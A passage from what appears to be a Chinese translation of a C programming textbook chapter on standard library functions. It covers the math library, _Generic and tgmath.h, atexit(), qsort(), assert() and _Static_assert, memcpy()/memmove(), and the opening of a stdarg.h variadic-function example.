库选项告诉系统到哪里查找函数代码。虽然这里无法涉及所有系统的细节, 但是可以提醒读者应该注意什么。 16.9.2 使用库描述 篇幅有限,我们无法讨论完整的库。但是,可以看几个具有代表性的示 例。首先,了解函数文档。 可以在多个地方找到函数文档。你所使用的系统可能有在线手册,集成 开发环境通常都有在线帮助。C实现的供应商可能提供描述库函数的纸质版 用户手册,或者把这些材料放在CD-ROM中或网上。有些出版社也出版C库 函数的参考手册。这些材料中,有些是一般材料,有些则是针对特定实现 的。本书附录B中提供了一个库函数的总结。 阅读文档的关键是看懂函数头。许多内容随时间变化而变化。下面是旧 的UNIX文档中,关于fread()的描述: #include <stdio.h> fread(ptr, sizeof(*ptr), nitems, stream) FILE *stream; 首先,给出了应该包含的文件,但是没有给出fread()、ptr、sizeof(*ptr) 或nitems的类型。过去,默认类型都是int,但是从描述中可以看出ptr是一个 指针(在早期的C中,指针被作为整数处理)。参数stream声明为指向FILE 1250 的指针。上面的函数声明中的第2个参数看上去像是sizeof运算符,而实际上 这个参数的值应该是ptr所指向对象的大小。虽然用sizeof作为参数没什么问 题,但是用int类型的值作为参数更符合语法。 后来,上面的描述变成了: #include <stdio.h> int fread(ptr, size, nitems, stream;) char *ptr; int size, nitems; FILE *stream; 现在,所有的类型都显式说明,ptr作为指向char的指针。 ANSI C90标准提供了下面的描述: #include <stdio.h> size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream); 首先,使用了新的函数原型格式。其次,改变了一些类型。size_t 类型 被定义为 sizeof 运算符的返回值类型——无符号整数类型,通常是unsigned int或unsigned long。stddef.h文件中包含了size_t类型的typedef或#define定义。 其他文件(包括stdio.h)通过包含stddef.h来包含这个定义。许多函数(包括 fread())的实际参数中都要使用sizeof运算符,形式参数的size_t类型中正好 匹配这种常见的情况。 另外,ANSI C把指向void的指针作为一种通用指针,用于指针指向不同 类型的情况。例如,fread()的第1个参数可能是指向一个double类型数组的指 针,也可能是指向其他类型结构的指针。如果假设实际参数是一个指向内含 20个double类型元素数组的指针,且形式参数是指向void的指针,那么编译 1251 器会选用合适的类型,不会出现类型冲突的问题。 C99/C11标准在以上的描述中加入了新的关键字restric: #include <stdio.h> size_t fread(void * restrict ptr, size_t size,size_t nmemb, FILE * restrict stream); 接下来,我们讨论一些特殊的函数。 1252 16.10 数学库 数学库中包含许多有用的数学函数。math.h头文件提供这些函数的原 型。表16.2中列出了一些声明在 math.h 中的函数。注意,函数中涉及的角度 都以弧度为单位(1 弧度=180/π=57.296 度)。参考资料 V“新增C99和C11标 准的ANSI C库”列出了C99和C11标准的所有函数。 表16.2 ANSI C标准的一些数学函数 16.10.1 三角问题 我们可以使用数学库解决一些常见的问题:把x/y坐标转换为长度和角 度。例如,在网格上画了一条线,该线条水平穿过了4个单元(x的值),垂 直穿过了3个单元(y的值)。那么,该线的长度(量)和方向是什么?根据 数学的三角公式可知: 大小 =square root (x2+y2) 1253 角度 = arctan(y/x) 数学库提供平方根函数和一对反正切函数,所以可以用C程序表示这个 问题。平方根函数是sqrt(),接受一个double类型的参数,并返回参数的平方 根,也是double类型。 atan()函数接受一个double类型的参数(即正切值),并返回一个角度 
(该角度的正切值就是参数值)。但是,当线的x值和y值均为-5时,atan() 函数产生混乱。因为(-5)/(-5)得1,所以atan()返回45°,该值与x和y均为5时的 返回值相同。也就是说,atan()无法区分角度相同但反向相反的线(实际 上,atan()返回值的单位是弧度而不是度,稍后介绍两者的转换)。 当然,C库还提供了atan2()函数。它接受两个参数:x的值和y的值。这 样,通过检查x和y的正负号就可以得出正确的角度值。atan2()和 atan()均返 回弧度值。把弧度转换为度,只需将弧度值乘以180,再除以pi即可。pi的 值通过计算表达式4*atan(1)得到。程序清单16.13演示了这些步骤。另外,学 习该程序还复习了结构和typedef相关的知识。 程序清单16.14 rect_pol.c程序 /* rect_pol.c -- 把直角坐标转换为极坐标 */ #include <stdio.h> #include <math.h> #define RAD_TO_DEG (180/(4 * atan(1))) typedef struct polar_v { double magnitude; double angle; } Polar_V; 1254 typedef struct rect_v { double x; double y; } Rect_V; Polar_V rect_to_polar(Rect_V); int main(void) { Rect_V input; Polar_V result; puts("Enter x and y coordinates; enter q to quit:"); while (scanf("%lf %lf", &input.x, &input.y) == 2) { result = rect_to_polar(input); printf("magnitude = %0.2f, angle = %0.2f\n", result.magnitude, result.angle); } puts("Bye."); return 0; } 1255 Polar_V rect_to_polar(Rect_V rv) { Polar_V pv; pv.magnitude = sqrt(rv.x * rv.x + rv.y * rv.y); if (pv.magnitude == 0) pv.angle = 0.0; else pv.angle = RAD_TO_DEG * atan2(rv.y, rv.x); return pv; } 下面是运行该程序后的一个输出示例: Enter x and y coordinates; enter q to quit: 10 10 magnitude = 14.14, angle = 45.00 -12 -5 magnitude = 13.00, angle = -157.38 q Bye. 如果编译时出现下面的消息: 1256 Undefined: _sqrt 或 'sqrt': unresolved external 或者其他类似的消息,表明编译器链接器没有找到数学库。UNIX系统 会要求使用-lm标记(flag)指示链接器搜索数学库: cc rect_pol.c –lm 注意,-lm标记在命令行的末尾。因为链接器在编译器编译C文件后才开 始处理。在Linux中使用GCC编译器可能要这样写: gcc rect_pol.c -lm 16.10.2 类型变体 基本的浮点型数学函数接受double类型的参数,并返回double类型的 值。当然,也可以把float或 long double 类型的参数传递给这些函数,它们仍 然能正常工作,因为这些类型的参数会被转换成double类型。这样做很方 便,但并不是最好的处理方式。如果不需要双精度,那么用float类型的单精 度值来计算会更快些。而且把long double类型的值传递给double类型的形参 会损失精度,形参获得的值可能不是原来的值。为了解决这些潜在的问题, C标准专门为float类型和long double类型提供了标准函数,即在原函数名前 加上f或l前缀。因此,sqrtf()是sqrt()的float版本,sqrtl()是sqrt()的long double 版本。 利用C11 新增的泛型选择表达式定义一个泛型宏,根据参数类型选择最 合适的数学函数版本。程序清单16.15演示了两种方法。 程序清单16.15 generic.c程序 // generic.c -- 定义泛型宏 1257 #include <stdio.h> #include <math.h> #define RAD_TO_DEG (180/(4 * atanl(1))) // 泛型平方根函数 #define SQRT(X) _Generic((X),\ long double: sqrtl, \ default: sqrt, \ float: sqrtf)(X) // 泛型正弦函数,角度的单位为度 #define SIN(X) _Generic((X),\ long double: sinl((X)/RAD_TO_DEG),\ default:  sin((X)/RAD_TO_DEG),\ float:   sinf((X)/RAD_TO_DEG)\ ) int main(void) { float x = 45.0f; double xx = 45.0; long double xxx = 45.0L; 1258 long double y = SQRT(x); long double yy = SQRT(xx); long double yyy = SQRT(xxx); printf("%.17Lf\n", y);   // 匹配 float printf("%.17Lf\n", yy);  // 匹配 default printf("%.17Lf\n", yyy);  // 匹配 long double int i = 45; yy = SQRT(i);        // 匹配 default printf("%.17Lf\n", yy); yyy = SIN(xxx);       // 匹配 long double printf("%.17Lf\n", yyy); return 0; } 下面是该程序的输出: 6.70820379257202148 6.70820393249936942 6.70820393249936909 6.70820393249936942 0.70710678118654752 1259 如上所示,SQRT(i)和SQRT(xx)的返回值相同,因为它们的参数类型分 别是int和double,所以只能与default标签对应。 有趣的一点是,如何让_Generic 宏的行为像一个函数。SIN()的定义也 许提供了一个方法:每个带标号的值都是函数调用,所以_Generic表达式的 值是一个特定的函数调用,如sinf((X)/RAD_TO_DEG),用传入SIN()的参数 替换X。 SQRT()的定义也许更简洁。_Generic表达式的值就是函数名,如sinf。 函数的地址可以代替该函数名,所以_Generic表达式的值是一个指向函数的 指针。然而,紧随整个_Generic表达式之后的是(X),函数指针(参数)表示函 数指针。因此,这是一个带指定的参数的函数指针。 简而言之,对于 SIN(),函数调用在泛型选择表达式内部;而对于 SQRT(),先对泛型选择表达式求值得一个指针,然后通过该指针调用它所 指向的函数。 16.10.3 tgmath.h库(C99) C99标准提供的tgmath.h头文件中定义了泛型类型宏,其效果与程序清单 16.15类似。如果在math.h中为一个函数定义了3种类型(float、double和long double)的版本,那么tgmath.h文件就创建一个泛型类型宏,与原来 double 版本的函数名同名。例如,根据提供的参数类型,定义 sqrt()宏展开为 sqrtf()、sqrt()或 sqrtl()函数。换言之,sqrt()宏的行为和程序清单 16.15 中的 SQRT()宏类似。 如果编译器支持复数运算,就会支持complex.h头文件,其中声明了与 
复数运算相关的函数。例如,声明有 csqrtf()、csqrt()和 csqrtl(),这些函数 分别返回 float complex、double complex和long double complex类型的复数平 方根。如果提供这些支持,那么tgmath.h中的sqrt()宏也能展开为相应的复数 平方根函数。 如果包含了tgmath.h,要调用sqrt()函数而不是sqrt()宏,可以用圆括号把 1260 被调用的函数名括起来: #include <tgmath.h> ... float x = 44.0; double y; y = sqrt(x);    // 调用宏,所以是 sqrtf(x) y = (sqrt)(x);  // 调用函数 sqrt() 这样做没问题,因为类函数宏的名称必须用圆括号括起来。圆括号只会 影响操作顺序,不会影响括起来的表达式,所以这样做得到的仍然是函数调 用的结果。实际上,在讨论函数指针时提到过,由于C语言奇怪而矛盾的函 数指针规则,还也可以使用(*sqrt)()的形式来调用sqrt()函数。 不借助C标准以外的机制,C11新增的_Generic表达式是实现tgmath.h最 简单的方式。 1261 16.11 通用工具库 通用工具库包含各种函数,包括随机数生成器、查找和排序函数、转换 函数和内存管理函数。第12章介绍过rand()、srand()、malloc()和free()函数。 在ANSI C标准中,这些函数的原型都在stdlib.h头文件中。附录B参考资料V 列出了该系列的所有函数。现在,我们来进一步讨论其中的几个函数。 16.11.1 exit()和atexit()函数 在前面的章节中我们已经在程序示例中用过 exit()函数。而且,在 main()返回系统时将自动调用exit()函数。ANSI 标准还新增了一些不错的功 能,其中最重要的是可以指定在执行 exit()时调用的特定函数。atexit()函数 通过退出时注册被调用的函数提供这种功能,atexit()函数接受一个函数指针 作为参数。程序清单16.16演示了它的用法。 程序清单16.16 byebye.c程序 /* byebye.c -- atexit()示例 */ #include <stdio.h> #include <stdlib.h> void sign_off(void); void too_bad(void); int main(void) { int n; atexit(sign_off);   /* 注册 sign_off()函数 */ 1262 puts("Enter an integer:"); if (scanf("%d", &n) != 1) { puts("That's no integer!"); atexit(too_bad); /* 注册 too_bad()函数 */ exit(EXIT_FAILURE); } printf("%d is %s.\n", n, (n % 2 == 0) ? "even" : "odd"); return 0; } void sign_off(void) { puts("Thus terminates another magnificent program from"); puts("SeeSaw Software!"); } void too_bad(void) { puts("SeeSaw Software extends its heartfelt condolences"); puts("to you upon the failure of your program."); 1263 } 下面是该程序的一个运行示例: Enter an integer: 212 212 is even. Thus terminates another magnificent program from SeeSaw Software! 如果在IDE中运行,可能看不到最后两行。下面是另一个运行示例: Enter an integer: what? That's no integer! SeeSaw Software extends its heartfelt condolences to you upon the failure of your program. Thus terminates another magnificent program from SeeSaw Software! 
在IDE中运行,可能看不到最后4行。 接下来,我们讨论atexit()和exit()的参数。 1.atexit()函数的用法 这个函数使用函数指针。要使用 atexit()函数,只需把退出时要调用的 1264 函数地址传递给 atexit()即可。函数名作为函数参数时相当于该函数的地 址,所以该程序中把sign_off或too_bad作为参数。然后,atexit()注册函数列 表中的函数,当调用exit()时就会执行这些函数。ANSI保证,在这个列表中 至少可以放 32 个函数。最后调用 exit()函数时,exit()会执行这些函数(执 行顺序与列表中的函数顺序相反,即最后添加的函数最先执行)。 注意,输入失败时,会调用sign_off()和too_bad()函数;但是输入成功时 只会调用sign_off()。因为只有输入失败时,才会进入if语句中注册 too_bad()。另外还要注意,最先调用的是最后一个被注册的函数。 atexit()注册的函数(如sign_off()和too_bad())应该不带任何参数且返回 类型为void。通常,这些函数会执行一些清理任务,例如更新监视程序的文 件或重置环境变量。 注意,即使没有显式调用exit(),还是会调用sign_off(),因为main()结束 时会隐式调用exit()。 2.exit()函数的用法 exit()执行完atexit()指定的函数后,会完成一些清理工作:刷新所有输出 流、关闭所有打开的流和关闭由标准I/O函数tmpfile()创建的临时文件。然后 exit()把控制权返回主机环境,如果可能的话,向主机环境报告终止状态。 通常,UNIX程序使用0表示成功终止,用非零值表示终止失败。UNIX返回 的代码并不适用于所有的系统,所以ANSI C为了可移植性的要求,定义了 一个名为EXIT_FAILURE的宏表示终止失败。类似地,ANSI C还定义了 EXIT_SUCCESS表示成功终止。不过,exit()函数也接受0表示成功终止。在 ANSI C中,在非递归的main()中使用exit()函数等价于使用关键字return。尽 管如此,在main()以外的函数中使用exit()也会终止整个程序。 16.11.2 qsort()函数 对较大型的数组而言,“快速排序”方法是最有效的排序算法之一。该算 法由C.A.R.Hoare于1962年开发。它把数组不断分成更小的数组,直到变成 1265 单元素数组。首先,把数组分成两部分,一部分的值都小于另一部分的值。 这个过程一直持续到数组完全排序好为止。 快速排序算法在C实现中的名称是qsort()。qsort()函数排序数组的数据 对象,其原型如下: void qsort(void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)); 第1个参数是指针,指向待排序数组的首元素。ANSI C允许把指向任何 数据类型的指针强制转换成指向void的指针,因此,qsort()的第1个实际参数 可以引用任何类型的数组。 第2个参数是待排序项的数量。函数原型把该值转换为size_t类型。前面 提到过,size_t定义在标准头文件中,是sizeof运算符返回的整数类型。 由于qsort()把第1个参数转换为void指针,所以qsort()不知道数组中每个 元素的大小。为此,函数原型用第 3 个参数补偿这一信息,显式指明待排序 数组中每个元素的大小。例如,如果排序 double类型的数组,那么第3个参 数应该是sizeof(double)。 最后,qsort()还需要一个指向函数的指针,这个被指针指向的比较函数 用于确定排序的顺序。该函数应接受两个参数:分别指向待比较两项的指 针。如果第1项的值大于第2项,比较函数则返回正数;如果两项相同,则返 回0;如果第1项的值小于第2项,则返回负数。qsort()根据给定的其他信息 计算出两个指针的值,然后把它们传递给比较函数。 qsort()原型中的第4个函数确定了比较函数的形式: int (*compar)(const void *, const void *) 这表明 qsort()最后一个参数是一个指向函数的指针,该函数返回 int 类 型的值且接受两个指向const void的指针作为参数,这两个指针指向待比较 1266 项。 程序清单16.17和后面的讨论解释了如何定义一个比较函数,以及如何 使用qsort()。该程序创建了一个内含随机浮点值的数组,并排序了这个数 组。 程序清单16.17 qsorter.c程序 /* qsorter.c -- 用 qsort()排序一组数字 */ #include <stdio.h> #include <stdlib.h> #define NUM 40 void fillarray(double ar [], int n); void showarray(const double ar [], int n); int mycomp(const void * p1, const void * p2); int main(void) { double vals[NUM]; fillarray(vals, NUM); puts("Random list:"); showarray(vals, NUM); qsort(vals, NUM, sizeof(double), mycomp); puts("\nSorted list:"); 1267 showarray(vals, NUM); return 0; } void fillarray(double ar [], int n) { int index; for (index = 0; index < n; index++) ar[index] = (double) rand() / ((double) rand() + 0.1); } void showarray(const double ar [], int n) { int index; for (index = 0; index < n; index++) { printf("%9.4f ", ar[index]); if (index % 6 == 5) putchar('\n'); } if (index % 6 != 0) 1268 putchar('\n'); } /* 按从小到大的顺序排序 */ int mycomp(const void * p1, const void * p2) { /* 要使用指向double的指针来访问这两个值 */ const double * a1 = (const double *) p1; const double * a2 = (const double *) p2; if (*a1 < *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 下面是该程序的运行示例: Random list: 0.0001  1.6475  2.4332  0.0693  0.7268  0.7383 24.0357 0.1009  87.1828 5.7361  0.6079  0.6330 1269 1.6058  0.1406  0.5933  1.1943  5.5295  2.2426 0.8364  2.7127  0.2514  0.9593  8.9635  0.7139 0.6249  1.6044  0.8649  2.1577  0.5420  15.0123 1.7931  1.6183  1.9973  2.9333  12.8512 1.3034 0.3032  1.1406  18.7880 0.9887 Sorted list: 0.0001  0.0693  0.1009  0.1406  0.2514  0.3032 0.5420  0.5933  0.6079  0.6249  0.6330  0.7139 0.7268  0.7383  0.8364  0.8649  0.9593  0.9887 1.1406  1.1943  1.3034  1.6044  1.6058  1.6183 1.6475  1.7931  1.9973  2.1577  2.2426 
 2.4332 2.7127  2.9333  5.5295  5.7361  8.9635  12.8512 15.0123 18.7880 24.0357 87.1828 接下来分析两点:qsort()的用法和mycomp()的定义。 1.qsort()的用法 qsort()函数排序数组的数据对象。该函数的ANSI原型如下: void qsort (void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)); 第1个参数值指向待排序数组首元素的指针。在该程序中,实际参数是 1270 double类型的数组名vals,因此指针指向该数组的首元素。根据该函数的原 型,参数 vals 会被强制转换成指向 void 的指针。由于ANSI C允许把指向任 何数据类型的指针强制转换成指向void的指针,所以qsort()的第1个实际参数 可以引用任何类型的数组。 第2个参数是待排序项的数量。在程序清单16.17中是NUM,即数组元素 的数量。函数原型把该值转换为size_t类型。 第3个参数是数组中每个元素占用的空间大小,本例中为 sizeof(double)。 最后一个参数是mycomp,这里函数名即是函数的地址,该函数用于比 较元素。 2.mycomp()的定义 前面提到过,qsort()的原型中规定了比较函数的形式: int (*compar)(const void *, const void *) 这表明 qsort()最后一个参数是一个指向函数的指针,该函数返回 int 类 型的值且接受两个指向const void的指针作为参数。程序中mycomp()使用的 就是这个原型: int mycomp(const void * p1, const void * p2); 记住,函数名作为参数时即是指向该函数的指针。因此,mycomp与 compar原型相匹配。 qsort()函数把两个待比较元素的地址传递给比较函数。在该程序中,把 待比较的两个double类型值的地址赋给p1和p2。注意,qsort()的第1个参数引 用整个数组,比较函数中的两个参数引用数组中的两个元素。这里存在一个 问题。为了比较指针所指向的值,必须解引用指针。因为值是 double 类 型,所以要把指针解引用为 double 类型的值。然而,qsort()要求指针指向 1271 void。要解决这个问题,必须在比较函数的内部声明两个类型正确的指针, 并初始化它们分别指向作为参数传入的值: /* 按从小到大的顺序排序值 */ int mycomp(const void * p1, const void * p2) { /* 使用指向double类型的指针访问值 */ const double * a1 = (const double *) p1; const double * a2 = (const double *) p2; if (*a1 < *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 简而言之,为了让该方法具有通用性,qsort()和比较函数使用了指向 void 的指针。因此,必须把数组中每个元素的大小明确告诉qsort(),并且在 比较函数的定义中,必须把该函数的指针参数转换为对具体应用而言类型正 确的指针。 注意C和C++中的void* 1272 C和C++对待指向void的指针有所不同。在这两种语言中,都可以把任 何类型的指针赋给void类型的指针。例如,程序清单16.17中,qsort()的函数 调用中把double*指针赋给void*指针。但是,C++要求在把void*指针赋给任 何类型的指针时必须进行强制类型转换。而C没有这样的要求。例如,程序 清单16.17中的mycomp()函数,就使用了这样的强制类型转换: const double * a1 = (const double *) p1; 这种强制类型转换,在C中是可选的,但在C++中是必须的。因为两种 语言都使用强制类型转换,所以遵循C++的要求也无不妥。将来如果要把该 程序转成C++,就不必更改这部分的代码。 下面再来看一个比较函数的例子。假设有下面的声明: struct names { char first[40]; char last[40]; }; struct names staff[100]; 如何调用qsort()?模仿程序清单16.17中qsort()的函数调用,应该是这 样: qsort(staff, 100, sizeof(struct names), comp); 这里 comp 是比较函数的函数名。那么,应如何编写这个函数?假设要 先按姓排序,如果同姓再按名排序,可以这样编写该函数: #include <string.h> int comp(const void * p1, const void * p2) /* 该函数的形式必须是这样 */ 1273 { /* 得到正确类型的指针 */ const struct names *ps1 = (const struct names *) p1; const struct names *ps2 = (const struct names *) p2; int res; res = strcmp(ps1->last, ps2->last); /* 比较姓 */ if (res != 0) return res; else /* 如果同姓,则比较名 */ return strcmp(ps1->first, ps2->first); } 该函数使用 strcmp()函数进行比较。strcmp()的返回值与比较函数的要求 相匹配。注意,通过指针访问结构成员时必须使用->运算符。 1274 16.12 断言库 assert.h 头文件支持的断言库是一个用于辅助调试程序的小型库。它由 assert()宏组成,接受一个整型表达式作为参数。如果表达式求值为假(非 零),assert()宏就在标准错误流(stderr)中写入一条错误信息,并调用 abort()函数终止程序(abort()函数的原型在stdlib.h头文件中)。assert()宏是 为了标识出程序中某些条件为真的关键位置,如果其中的一个具体条件为 假,就用 assert()语句终止程序。通常,assert()的参数是一个条件表达式或 逻辑表达式。如果 assert()中止了程序,它首先会显示失败的测试、包含测 试的文件名和行号。 16.12.1 assert的用法 程序清单16.18演示了一个使用assert的小程序。在求平方根之前,该程 序断言z是否大于或等于0。程序还错误地减去一个值而不是加上一个值,故 意让z得到不合适的值。 程序清单16.18 assert.c程序 /* assert.c -- 使用 assert() */ #include <stdio.h> #include <math.h> #include <assert.h> int main() { double x, y, z; puts("Enter a pair of numbers (0 0 to quit): "); 1275 while (scanf("%lf%lf", &x, &y) == 2 && (x != 0 || y != 0)) { z = x * x - y * y; /* 应该用 + */ assert(z >= 0); printf("answer is %f\n", sqrt(z)); puts("Next pair of numbers: "); } puts("Done"); return 0; } 下面是该程序的运行示例: Enter a pair of numbers (0 0 to quit): 4 3 answer is 2.645751 Next pair of numbers: 5 3 answer is 4.000000 Next pair of numbers: 1276 3 5 Assertion failed: (z >= 0), function main, file /Users/assert.c, line 14. 
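顺带一提,有一个常用的小技巧可以让断言失败时的提示更容易读懂:在断言条件后面用 && 连接一个字符串字面量。字符串字面量的值总是非空指针(恒为“真”),因此不会改变断言本身的逻辑;而按标准的要求,assert()失败时会把参数表达式的文本一并打印出来,这个字符串也就出现在错误信息里。下面是一个示意(这只是惯用写法,并不是 assert() 提供的专门功能):

assert(z >= 0 && "z should not be negative");  /* 逻辑上等同于 assert(z >= 0) */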
具体的错误提示因编译器而异。让人困惑的是,这条消息可能不是指明 z >= 0,而是指明没有满足z >=0的条件。 用if语句也能完成类似的任务: if (z < 0) { puts("z less than 0"); abort(); } 但是,使用 assert()有几个好处:它不仅能自动标识文件和出问题的行 号,还有一种无需更改代码就能开启或关闭 assert()的机制。如果认为已经 排除了程序的 bug,就可以把下面的宏定义写在包含assert.h的位置前面: #define NDEBUG 并重新编译程序,这样编译器就会禁用文件中的所有 assert()语句。如 果程序又出现问题,可以移除这条#define指令(或者把它注释掉),然后重 新编译程序,这样就重新启用了assert()语句。 16.12.2 _Static_assert(C11) assert()表达式是在运行时进行检查。C11新增了一个特性: _Static_assert声明,可以在编译时检查assert()表达式。因此,assert()可以导 致正在运行的程序中止,而_Static_assert()可以导致程序无法通过编译。 _Static_assert()接受两个参数。第1个参数是整型常量表达式,第2个参数是 1277 一个字符串。如果第 1 个表达式求值为 0(或_False),编译器会显示字符 串,而且不编译该程序。看看程序清单16.19的小程序,然后查看assert()和 _Static_assert()的区别。 程序清单16.19 statasrt.c程序 // statasrt.c #include <stdio.h> #include <limits.h> _Static_assert(CHAR_BIT == 16, "16-bit char falsely assumed"); int main(void) { puts("char is 16 bits."); return 0; } 下面是在命令行编译的示例: $ clang statasrt.c statasrt.c:4:1: error: static_assert failed "16-bit char falsely assumed" _Static_assert(CHAR_BIT == 16, "16-bit char falsely assumed"); ^        ~~~~~~~~~~~~~~ 1 error generated. $ 1278 根据语法,_Static_assert()被视为声明。因此,它可以出现在函数中, 或者在这种情况下出现在函数的外部。 _Static_assert要求它的第1个参数是整型常量表达式,这保证了能在编 译期求值(sizeof表达式被视为整型常量)。不能用程序清单16.18中的assert 代替_Static_assert,因为assert中作为测试表达式的z > 0不是常量表达式,要 到程序运行时才求值。当然,可以在程序清单16.19的main()函数中使用 assert(CHAR_BIT == 16),但这会在编译和运行程序后才生成一条错误信 息,很没效率。 1279 16.13 string.h库中的memcpy()和memmove() 不能把一个数组赋给另一个数组,所以要通过循环把数组中的每个元素 赋给另一个数组相应的元素。有一个例外的情况是:使用strcpy()和strncpy() 函数来处理字符数组。memcpy()和memmove()函数提供类似的方法处理任意 类型的数组。下面是这两个函数的原型: void *memcpy(void * restrict s1, const void * restrict s2, size_t n); void *memmove(void *s1, const void *s2, size_t n); 这两个函数都从 s2 指向的位置拷贝 n 字节到 s1 指向的位置,而且都返 回 s1 的值。所不同的是, memcpy()的参数带关键字restrict,即memcpy()假 设两个内存区域之间没有重叠;而memmove()不作这样的假设,所以拷贝过 程类似于先把所有字节拷贝到一个临时缓冲区,然后再拷贝到最终目的地。 如果使用 memcpy()时,两区域出现重叠会怎样?其行为是未定义的,这意 味着该函数可能正常工作,也可能失败。编译器不会在本不该使用 memcpy()时禁止你使用,作为程序员,在使用该函数时有责任确保两个区域 不重叠。 由于这两个函数设计用于处理任何数据类型,所有它们的参数都是两个 指向 void 的指针。C 允许把任何类型的指针赋给void *类型的指针。如此宽 容导致函数无法知道待拷贝数据的类型。因此,这两个函数使用第 3 个参数 指明待拷贝的字节数。注意,对数组而言,字节数一般与元素个数不同。如 果要拷贝数组中10个double类型的元素,要使用10*sizeof(double),而不是 10。 程序清单16.20中的程序使用了这两个函数。该程序假设double类型是int 类型的两倍大小。另外,该程序还使用了C11的_Static_assert特性测试断 言。 程序清单16.20 mems.c程序 1280 // mems.c -- 使用 memcpy() 和 memmove() #include <stdio.h> #include <string.h> #include <stdlib.h> #define SIZE 10 void show_array(const int ar [], int n); // 如果编译器不支持C11的_Static_assert,可以注释掉下面这行 _Static_assert(sizeof(double) == 2 * sizeof(int), "double not twice int size"); int main() { int values[SIZE] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 }; int target[SIZE]; double curious[SIZE / 2] = { 2.0, 2.0e5, 2.0e10, 2.0e20, 5.0e30 }; puts("memcpy() used:"); puts("values (original data): "); show_array(values, SIZE); memcpy(target, values, SIZE * sizeof(int)); puts("target (copy of values):"); show_array(target, SIZE); 1281 puts("\nUsing memmove() with overlapping ranges:"); memmove(values + 2, values, 5 * sizeof(int)); puts("values -- elements 0-4 copied to 2-6:"); show_array(values, SIZE); puts("\nUsing memcpy() to copy double to int:"); memcpy(target, curious, (SIZE / 2) * sizeof(double)); puts("target -- 5 doubles into 10 int positions:"); show_array(target, SIZE / 2); show_array(target + 5, SIZE / 2); return 0; } void show_array(const int ar [], int n) { int i; for (i = 0; i < n; i++) printf("%d ", ar[i]); putchar('\n'); } 下面是该程序的输出: 1282 memcpy() used: values (original data): 1 2 3 4 5 6 7 8 9 10 target (copy of values): 1 2 3 4 5 6 7 8 9 10 Using memmove() with overlapping ranges: values -- elements 0-4 copied 
to 2-6: 1 2 1 2 3 4 5 8 9 10 Using memcpy() to copy double to int: target -- 5 doubles into 10 int positions: 0 1073741824 0 1091070464 536870912 1108516959 2025163840 1143320349 -2012696540 1179618799 程序中最后一次调用 memcpy()从 double 类型数组中把数据拷贝到 int 类 型数组中,这演示了memcpy()函数不知道也不关心数据的类型,它只负责从 一个位置把一些字节拷贝到另一个位置(例如,从结构中拷贝数据到字符数 组中)。而且,拷贝过程中也不会进行数据转换。如果用循环对数组中的每 个元素赋值,double类型的值会在赋值过程被转换为int类型的值。这种情况 下,按原样拷贝字节,然后程序把这些位组合解释成int类型。 1283 16.14 可变参数:stdarg.h 本章前面提到过变参宏,即该宏可以接受可变数量的参数。stdarg.h 头 文件为函数提供了一个类似的功能,但是用法比较复杂。必须按如下步骤进 行: 1.提供一个使用省略号的函数原型; 2.在函数定义中创建一个va_list类型的变量; 3.用宏把该变量初始化为一个参数列表; 4.用宏访问参数列表; 5.用宏完成清理工作。 接下来详细分析这些步骤。这种函数的原型应该有一个形参列表,其中 至少有一个形参和一个省略号: void f1(int n, ...);        // 有效 int f2(const char * s, int k, ...); // 有效 char f3(char c1, ..., char c2);// 无效,省略号不在最后 double f3(...);           // 无效,没有形参 最右边的形参(即省略号的前一个形参)起着特殊的作用,标准中用 parmN这个术语来描述该形参。在上面的例子中,第1行f1()中parmN为n,第 2行f2()中parmN为k。传递给该形参的实际参数是省略号部分代表的参数数 量。例如,可以这样使用前面声明的f1()函数: f1(2, 200, 400);      // 2个额外的参数 f1(4, 13, 117, 18, 23);  // 4个额外的参数 1284 接下来,声明在stdarg.h中的va_list类型代表一种用于储存形参对应的形 参列表中省略号部分的数据对象。变参函数的定义起始部分类似下面这样: double sum(int lim,...) { va_list ap;  //声明一个储存参数的对象 在该例中,lim是parmN形参,它表明变参列表中参数的数量。 然后,该函数将使用定义在stdarg.h中的va_start()宏,把参数列表拷贝到 va_list类型的变量中。该宏有两个参数:va_list类型的变量和parmN形参。 接着上面的例子讨论,va_list类型的变量是ap,parmN形参是lim。所以,应 这样调用它: va_start(ap, lim); // 把ap初始化为参数列表 下一步是访问参数列表的内容,这涉及使用另一个宏va_arg()。该宏接 受两个参数:一个va_list类型的变量和一个类型名。第1次调用va_arg()时, 它返回参数列表的第1项;第2次调用时返回第2项,以此类推。表示类型的 参数指定了返回值的类型。例如,如果参数列表中的第1个参数是double类 型,第2个参数是int类型,可以这样做: double tic; int toc; ... tic = va_arg(ap, double); // 检索第1个参数 toc = va_arg(ap, int);   //检索第2个参数 注意,传入的参数类型必须与宏参数的类型相匹配。如果第1个参数是 1285 10.0,上面tic那行代码可以正常工作。但是如果参数是10,这行代码可能会 出错。这里不会像赋值那样把double类型自动转换成int类型。 最后,要使用va_end()宏完成清理工作。例如,释放动态分配用于储存 参数的内存。该宏接受一个va_list类型的变量: va_end(ap); // 清理工作 调用va_end(ap)后,只有用va_start重新初始化ap后,才能使用变量ap。 因为va_arg()不提供退回之前参数的方法,所以有必要保存va_list类型 变量的副本。C99新增了一个宏用于处理这种情况:va_copy()。该宏接受两 个va_list类型的变量作为参数,它把第2个参数拷贝给第1个参数: va_list ap; va_list apcopy; double double tic; int toc; ... va_start(ap, lim);     // 把ap初始化为一个参数列表 va_copy(apcopy, ap);    // 把apcopy作为ap的副本 tic = va_arg(ap, double); // 检索第1个参数 toc = va_arg(ap, int);   // 检索第2个参数 此时,即使删除了ap,也可以从apcopy中检索两个参数。 1286 程序清单 16.21 中的程序示例中演示了如何创建这样的函数,该函数对 可变参数求和。sum()的第 1个参数是待求和项的数目。 程序清单16.21 varargs.c程序 //varargs.c -- use variable number of arguments #include <stdio.h> #include <stdarg.h> double sum(int, ...); int main(void) { double s, t; s = sum(3, 1.1, 2.5, 13.3); t = sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1); printf("return value for " "sum(3, 1.1, 2.5, 13.3):       %g\n", s); printf("return value for " "sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1): %g\n", t); return 0; } double sum(int lim, ...) 1287 { va_list ap;           // 声明一个对象储存参数 double tot = 0; int i; va_start(ap, 